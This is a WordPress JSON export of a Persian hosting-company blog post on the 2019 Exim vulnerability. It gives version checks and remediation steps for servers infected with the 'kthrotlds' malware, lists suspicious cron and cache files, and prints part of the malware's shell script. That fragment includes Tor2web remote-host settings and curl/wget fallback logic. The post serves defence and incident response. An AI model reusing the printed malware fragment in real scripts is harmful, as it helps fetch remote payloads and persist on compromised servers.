{"id":3367,"date":"2019-06-12T14:32:50","date_gmt":"2019-06-12T10:02:50","guid":{"rendered":"https:\/\/www.irwebhost.com\/blog\/?p=3367"},"modified":"2019-06-12T14:32:50","modified_gmt":"2019-06-12T10:02:50","slug":"%d9%85%d8%b4%da%a9%d9%84-%d8%a7%d9%85%d9%86%db%8c%d8%aa%db%8c-exim","status":"publish","type":"post","link":"https:\/\/www.irwebhost.com\/blog\/%d9%85%d8%b4%da%a9%d9%84-%d8%a7%d9%85%d9%86%db%8c%d8%aa%db%8c-exim\/","title":{"rendered":"\u0645\u0634\u06a9\u0644 \u0627\u0645\u0646\u06cc\u062a\u06cc exim"},"content":{"rendered":"

\u0628\u0631 \u0627\u0633\u0627\u0633 \u06af\u0632\u0627\u0631\u0634 \u0627\u062e\u06cc\u0631<\/a> \u062f\u0631 \u0631\u0627\u0628\u0637\u0647 \u0628\u0627 \u0645\u0634\u06a9\u0644 \u0627\u0645\u0646\u06cc\u062a\u06cc Exim \u0627\u06cc\u0646 \u062d\u0641\u0631\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc \u0645\u0634\u06a9\u0644\u0627\u062a \u0645\u062a\u0639\u062f\u062f\u06cc \u0631\u0627 \u0628\u0631\u0627\u06cc \u0633\u0631\u0648\u0631 \u0647\u0627\u06cc \u062f\u0627\u0631\u0627\u06cc \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631 exim \u0627\u06cc\u062c\u0627\u062f \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a \u0648 \u0645\u06cc\u0644\u06cc\u0648\u0646 \u0647\u0627 \u0633\u0631\u0648\u0631 \u062a\u062d\u062a \u062a\u0627\u062b\u06cc\u0631 \u0627\u06cc\u0646 \u0645\u0648\u0636\u0648\u0639 \u0642\u0631\u0627\u0631 \u06af\u0631\u0641\u062a\u0647 \u0627\u0646\u062f. \u0627\u06cc\u0646 \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631 \u0628\u0631 \u0631\u0648\u06cc \u0633\u0631\u0648\u0631 \u0647\u0627\u06cc \u0633\u06cc \u067e\u0646\u0644 \u0646\u06cc\u0632 \u0628\u0647 \u0634\u06a9\u0644 \u06af\u0633\u062a\u0631\u062f\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u0634\u0648\u062f \u0648 \u0644\u0627\u0632\u0645 \u0627\u0633\u062a \u062f\u0631 \u0627\u06cc\u0646 \u062e\u0635\u0648\u0635 \u0627\u0642\u062f\u0627\u0645\u0627\u062a \u0644\u0627\u0632\u0645 \u0635\u0648\u0631\u062a \u06af\u06cc\u0631\u062f.<\/p>\n

\u0686\u06af\u0648\u0646\u0647 \u0648\u0631\u0698\u0646 Exim \u0631\u0627 \u062f\u0631 \u0633\u06cc \u067e\u0646\u0644 \u06a9\u0646\u062a\u0631\u0644 \u06a9\u0646\u06cc\u0645 \u061f<\/strong><\/p>\n

\u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0645\u06cc\u062a\u0648\u0627\u0646\u06cc\u0645 \u0646\u0633\u062e\u0647 Exim \u0631\u0627 \u06a9\u0646\u062a\u0631\u0644 \u06a9\u0646\u06cc\u0645 \u0648 \u062f\u0631 \u0635\u0648\u0631\u062a\u06cc \u06a9\u0647 \u062e\u0627\u0631\u062c \u0627\u0632 \u0627\u06cc\u0646 \u0645\u062d\u062f\u0648\u062f\u0647 \u0642\u0631\u0627\u0631 \u062f\u0627\u0634\u062a \u0644\u0627\u0632\u0645 \u0627\u0633\u062a \u0628\u0631\u0648\u0632 \u0631\u0633\u0627\u0646\u06cc \u0635\u0648\u0631\u062a \u06af\u06cc\u0631\u062f.<\/p>\n

\u06a9\u0646\u062a\u0631\u0644 \u0648\u0631\u0698\u0646 :<\/p>\n

rpm -q exim\r\n\r\nwhmapi1 installed_versions packages=1|grep exim\r\n\r\nexim --version<\/pre>\n
\u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u06cc\u0634\u062a\u0631 \u062f\u0631 \u062e\u0635\u0648\u0635 \u0648\u0631\u0698\u0646 \u0631\u0627 \u0645\u06cc\u062a\u0648\u0627\u0646\u06cc\u062f \u0627\u0632 \u0627\u06cc\u0646 \u0644\u06cc\u0646\u06a9<\/a> \u062f\u0631 \u0627\u062e\u062a\u06cc\u0627\u0631 \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u06cc\u062f :<\/p>\n
\u062f\u0631 \u0635\u0648\u0631\u062a\u06cc \u06a9\u0647 \u0633\u0631\u0648\u0631 \u0622\u0633\u06cc\u0628 \u062f\u06cc\u062f\u0647 \u0628\u0627\u0634\u062f :\u200c<\/strong><\/p>\n
\u0645\u0648\u0627\u0631\u062f \u0632\u06cc\u0631 \u062a\u0627\u06a9\u0646\u0648\u0646 \u062f\u0631 \u0627\u06cc\u0646 \u0633\u0631\u0648\u0631 \u0647\u0627 \u0645\u0634\u0627\u0647\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a \u0648 \u067e\u06cc\u0634\u0646\u0647\u0627\u062f \u0645\u06cc\u06af\u0631\u062f\u062f \u0627\u0646\u062c\u0627\u0645 \u0634\u0648\u062f<\/p>\n
\u06f1) \u0628\u0627\u06cc\u062f \u0633\u0631\u0648\u06cc\u0633 cron \u0631\u0627 \u0645\u062a\u0648\u0642\u0641 \u0646\u0645\u0627\u06cc\u06cc\u062f \u0686\u0631\u0627 \u06a9\u0647 \u0627\u06cc\u0646 \u0633\u0631\u0648\u06cc\u0633 \u062f\u0631 crontab \u0634\u0645\u0627 \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a\u06cc \u0627\u06cc\u062c\u0627\u062f \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a.<\/p>\n
service crond stop<\/p>\n
\u06f2)\u200c \u0627\u062d\u062a\u0645\u0627\u0644\u0627 \u0633\u0631\u0648\u06cc\u0633 \u0632\u06cc\u0631 \u062f\u0631 \u062d\u0627\u0641\u0638\u0647 \u0633\u0631\u0648\u0631 \u062f\u0631 \u062d\u0627\u0644 \u0627\u062c\u0631\u0627\u0633\u062a \u0648 \u0644\u0627\u0632\u0645 \u0627\u0633\u062a \u0622\u0646 \u0631\u0627 \u0645\u062a\u0648\u0642\u0641 \u0646\u0645\u0627\u06cc\u06cc\u062f<\/p>\n
pkill -9 -f kthrotlds<\/p>\n
\u0628\u0631\u0627\u06cc \u0627\u0637\u0645\u06cc\u0646\u0627\u0646 \u0627\u0632 \u0627\u06cc\u0646\u06a9\u0647 \u0627\u0632 \u062d\u0627\u0641\u0638\u0647 \u062d\u0630\u0641 \u0634\u062f\u0647 \u0627\u0633\u062a \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0646\u0645\u0627\u06cc\u06cc\u062f<\/p>\n
ps aux | grep kthrotlds<\/p>\n
 <\/p>\n
\u06f3)\u200c \u0641\u0627\u06cc\u0644 \u0632\u06cc\u0631 \u0631\u0627 \u062d\u0630\u0641 \u0646\u0645\u0627\u06cc\u06cc\u062f \u0627\u06cc\u0646 \u0641\u0627\u06cc\u0644 \u0647\u0645\u0627\u0646 \u0641\u0627\u06cc\u0644\u06cc \u0627\u0633\u062a \u06a9\u0647 \u062f\u0631 \u062d\u0627\u0641\u0638\u0647 \u0633\u0631\u0648\u0631 \u0634\u0645\u0627 \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u0645\u06cc\u0634\u0648\u062f<\/p>\n
 <\/p>\n
\/usr\/bin\/[kthrotlds]<\/p>\n
 <\/p>\n
\u06f4) \u06a9\u0631\u0627\u0646 \u062c\u0627\u0628 \u0647\u0627\u06cc \u0622\u0644\u0648\u062f\u0647 \u0631\u0627 \u0628\u0627 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0645\u06cc\u062a\u0648\u0627\u0646\u06cc\u062f \u067e\u06cc\u062f\u0627 \u06a9\u0646\u06cc\u062f<\/p>\n
grep -r passwd \/var\/spool\/cron*<\/p>\n
 <\/p>\n
\u06f5)<\/p>\n
\u0645\u0633\u06cc\u0631 \u0647\u0627\u06cc \u0632\u06cc\u0631 \u0631\u0627 \u0628\u0631\u0627\u06cc \u06cc\u0627\u0641\u062a\u0646 \u06a9\u062f\u0647\u0627\u06cc \u0645\u062e\u0631\u0628 \u0631\u0633\u062f \u06a9\u0646\u06cc\u062f :\u200c<\/p>\n
\/etc\/\r\n\/root\/\r\n\/usr\/local\/bin\r\n\r\n<\/pre>\n
\u0628\u0631\u0627\u06cc \u0645\u0634\u0627\u0647\u062f\u0647 \u0641\u0627\u06cc\u0644 \u0647\u0627\u06cc \u062a\u063a\u06cc\u06cc\u0631 \u06cc\u0627\u0641\u062a\u0647 \u062f\u0631 \u06f5 \u0631\u0648\u0632 \u06af\u0630\u0634\u062a\u0647 \u0686\u0646\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u06cc \u0645\u06cc\u062a\u0648\u0627\u0646\u062f \u06a9\u0645\u06a9 \u06a9\u0646\u062f<\/p>\n
find \/etc\/ -mtime -5 -print\r\n<\/pre>\n
 <\/p>\n
\u0646\u0645\u0648\u0646\u0647 \u06a9\u062f \u0645\u062e\u0631\u0628 \u0645\u0634\u0627\u0628\u0647 \u0632\u06cc\u0631 \u0627\u0633\u062a<\/p>\n
#!\/bin\/sh\r\nSHELL=\/bin\/sh\r\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\r\nRHOST=\u201dhttps:\/\/an7kmd2wp4xo7hpr\u201d\r\nTOR1=\u201d.tor2web.su\/\u201d\r\nTOR2=\u201d.tor2web.io\/\u201d\r\nTOR3=\u201d.onion.sh\/\u201d\r\nRPATH1=\u2019src\/ldm\u2019\r\n#LPATH=\u201d${HOME-\/tmp}\/.cache\/\u201d\r\nTIMEOUT=\u201d75\u2033\r\nCTIMEOUT=\u201d22\u2033\r\nCOPTS=\u201d -fsSLk \u2013retry 2 \u2013connect-timeout ${CTIMEOUT} \u2013max-time ${TIMEOUT} \u201d\r\nWOPTS=\u201d \u2013quiet \u2013tries=2 \u2013wait=5 \u2013no-check-certificate \u2013connect-timeout=${CTIMEOUT} \u2013timeout=${TIMEOUT} \u201d\r\ntbin=$(command -v passwd); bpath=$(dirname \u201c${tbin}\u201d)\r\ncurl=\u201dcurl\u201d; if [ $(curl \u2013version 2>\/dev\/null|grep \u201ccurl \u201c|wc -l) -eq 0 ]; then curl=\u201decho\u201d; if [ \u201c${bpath}\u201d != \u201c\u201d ]; then for f in ${bpath}*; do strings $f 2>\/dev\/null|grep -q \u201cCURLOPT_VERBOSE\u201d && curl=\u201d$f\u201d && break; done; fi; fi\r\nwget=\u201dwget\u201d; if [ $(wget \u2013version 2>\/dev\/null|grep \u201cwgetrc \u201c|wc -l) -eq 0 ]; then wget=\u201decho\u201d; if [ \u201c${bpath}\u201d != \u201c\u201d ]; then for f in ${bpath}*; do strings $f 2>\/dev\/null|grep -q \u201c.wgetrc\u2019-style command\u201d && wget=\u201d$f\u201d && break; done; fi; fi\r\n#CHKCURL=\u2019curl=\u201dcurl \u201c; wget=\u201dwget \u201c; if [ \u201c$(whoami)\u201d = \u201croot\u201d ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls \/usr\/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl=\u201decho \u201c; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls \/usr\/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget=\u201decho \u201c; fi; if [ $(cat \/etc\/hosts|grep -i \u201c.onion.\u201d|wc -l) -ne 0 ]; then echo \u201c127.0.0.1 localhost\u201d > \/etc\/hosts >\/dev\/null 2>&1; fi; fi; \u2018\r\nCHKCURL=\u2019tbin=$(command -v passwd); bpath=$(dirname \u201c${tbin}\u201d); curl=\u201dcurl\u201d; if [ $(curl \u2013version 2>\/dev\/null|grep \u201ccurl \u201c|wc -l) -eq 0 ]; then curl=\u201decho\u201d; if [ \u201c${bpath}\u201d != \u201c\u201d ]; then for f in ${bpath}*; do strings $f 2>\/dev\/null|grep -q \u201cCURLOPT_VERBOSE\u201d && curl=\u201d$f\u201d && break; done; fi; fi; wget=\u201dwget\u201d; if [ $(wget \u2013version 2>\/dev\/null|grep \u201cwgetrc \u201c|wc -l) -eq 0 ]; then wget=\u201decho\u201d; if [ \u201c${bpath}\u201d != \u201c\u201d ]; then for f in ${bpath}*; do strings $f 2>\/dev\/null|grep -q \u201cto \u201d && wget=\u201d$f\u201d && break; done; fi; fi; if [ $(cat \/etc\/hosts|grep -i \u201c.onion.\u201d|wc -l) -ne 0 ]; then echo \u201c127.0.0.1 localhost\u201d > \/etc\/hosts >\/dev\/null 2>&1; fi; \u2018\r\nLBIN8=\u201dkthrotlds\u201d\r\nnull=\u2019 >\/dev\/null 2>&1\u2032<\/pre>\n
 <\/p>\n
 <\/p>\n
\u06f6) \u0645\u0633\u06cc\u0631 \u0647\u0627\u06cc \u0632\u06cc\u0631 \u0631\u0627 \u0628\u0647 \u062f\u0642\u062a \u0628\u0631\u0631\u0633\u06cc \u0648 authorized_keys \u0631\u0627 \u062d\u0630\u0641 \u0646\u0645\u0627\u06cc\u06cc\u062f<\/p>\n
 <\/p>\n
 \/root\/.ssh\/authorized_keys, \/etc\/cron.d, \/etc\/cron.daily, \/etc\/cron.weekly, \/etc\/cron.monthly<\/pre>\n
 <\/p>\n
\u06f7) \u0627\u06cc\u0646 \u0641\u0627\u06cc\u0644 \u0647\u0627 \u0645\u0634\u06a9\u0648\u06a9 \u0647\u0633\u062a\u0646\u062f \u0648 \u067e\u0633 \u0627\u0632 \u0627\u0637\u0645\u06cc\u0646\u0627\u0646 \u0622\u0646\u0647\u0627 \u0631\u0627 \u062e\u0630\u0641 \u0646\u0645\u0627\u06cc\u06cc\u062f<\/p>\n
\/etc\/cron.daily\/cronlog\r\n\/etc\/cron.d\/root\r\n\/etc\/cron.d\/.cronbus\r\n\/etc\/cron.hourly\/cronlog\r\n\/etc\/cron.monthly\/cronlog\r\n\/var\/spool\/cron\/root\r\n\/var\/spool\/cron\/crontabs\/root\r\n\/etc\/cron.d\/root\r\n\/etc\/crontab\r\n\/root\/.cache\/\r\n\/root\/.cache\/a\r\n\/usr\/local\/bin\/nptd\r\n\/root\/.cache\/.kswapd\r\n\/usr\/bin\/\\[kthrotlds\\]\r\n\/root\/.ssh\/authorized_keys\r\n\/.cache\/*\r\n\/.cache\/.sysud\r\n\/.cache\/.a\r\n\/.cache\/.favicon.ico\r\n\/.cache\/.kswapd\r\n\/.cache\/.ntp<\/pre>\n
\u06f8) \u0641\u0627\u06cc\u0644 \/etc\/rc.local \u0647\u0645\u0627\u0646\u0637\u0648\u0631\u06cc \u06a9\u0647 \u0645\u06cc\u062f\u0627\u0646\u06cc\u062f \u0641\u0627\u06cc\u0644 \u0645\u0647\u0645\u06cc \u0627\u0633\u062a \u0627\u06cc\u0646 \u0641\u0627\u06cc\u0644 \u0631\u0627 \u0628\u0627 \u062f\u0642\u062a \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u0648\u0631 autostart \u062c\u0633\u062a\u062c\u0648 \u06a9\u0646\u06cc\u062f<\/p>\n
 <\/p>\n
\u06f9)\u200c\u0644\u0627\u0632\u0645 \u0627\u0633\u062a \u0628\u0639\u062f \u0627\u0632 \u0627\u0639\u0645\u0627\u0644 \u0647\u0645\u0647 \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a \u0633\u0631\u0648\u0631 \u0631\u0627 \u0631\u06cc\u0628\u0648\u062a \u06a9\u0646\u06cc\u062f.<\/p>\n
 <\/p>\n","protected":false},"excerpt":{"rendered":"
\u0628\u0631 \u0627\u0633\u0627\u0633\u0627\u06cc\u0646 \u0644\u06cc\u0646\u06a9 \u062f\u0631 \u0627\u062e\u062a\u06cc\u0627\u0631 \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u06cc\u062f : \u062f\u0631 \u0635\u0648\u0631\u062a\u06cc \u06a9\u0647 \u0633\u0631\u0648\u0631 \u0622\u0633\u06cc\u0628 \u062f\u06cc\u062f\u0647 \u0628\u0627\u0634\u062f :\u200c \u0645\u0648\u0627\u0631\u062f \u0632\u06cc\u0631 \u062a\u0627\u06a9\u0646\u0648\u0646 \u062f\u0631 \u0627\u06cc\u0646 \u0633\u0631\u0648\u0631 \u0647\u0627 \u0645\u0634\u0627\u0647\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a \u0648 \u067e\u06cc\u0634\u0646\u0647\u0627\u062f \u0645\u06cc\u06af\u0631\u062f\u062f \u0627\u0646\u062c\u0627\u0645 \u0634\u0648\u062f \u06f1) \u0628\u0627\u06cc\u062f \u0633\u0631\u0648\u06cc\u0633 cron \u0631\u0627 \u0645\u062a\u0648\u0642\u0641 \u0646\u0645\u0627\u06cc\u06cc\u062f \u0686\u0631\u0627 \u06a9\u0647 \u0627\u06cc\u0646 \u0633\u0631\u0648\u06cc\u0633 \u062f\u0631 crontab \u0634\u0645\u0627 \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a\u06cc \u0627\u06cc\u062c\u0627\u062f \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a. service crond stop \u06f2)\u200c \u0627\u062d\u062a\u0645\u0627\u0644\u0627 \u0633\u0631\u0648\u06cc\u0633 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[15,6,18],"tags":[358,356,357],"class_list":["post-3367","post","type-post","status-publish","format-standard","hentry","category-15","category-dedicated-servers","category-18","tag-kthrotlds","tag--exim","tag-357"],"_links":{"self":[{"href":"https:\/\/www.irwebhost.com\/blog\/wp-json\/wp\/v2\/posts\/3367","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.irwebhost.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.irwebhost.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.irwebhost.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.irwebhost.com\/blog\/wp-json\/wp\/v2\/comments?post=3367"}],"version-history":[{"count":3,"href":"https:\/\/www.irwebhost.com\/blog\/wp-json\/wp\/v2\/posts\/3367\/revisions"}],"predecessor-version":[{"id":3370,"href":"https:\/\/www.irwebhost.com\/blog\/wp-json\/wp\/v2\/posts\/3367\/revisions\/3370"}],"wp:attachment":[{"href":"https:\/\/www.irwebhost.com\/blog\/wp-json\/wp\/v2\/media?parent=3367"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.irwebhost.com\/blog\/wp-json\/wp\/v2\/categories?post=3367"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.irwebhost.com\/blog\/wp-json\/wp\/v2\/tags?post=3367"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}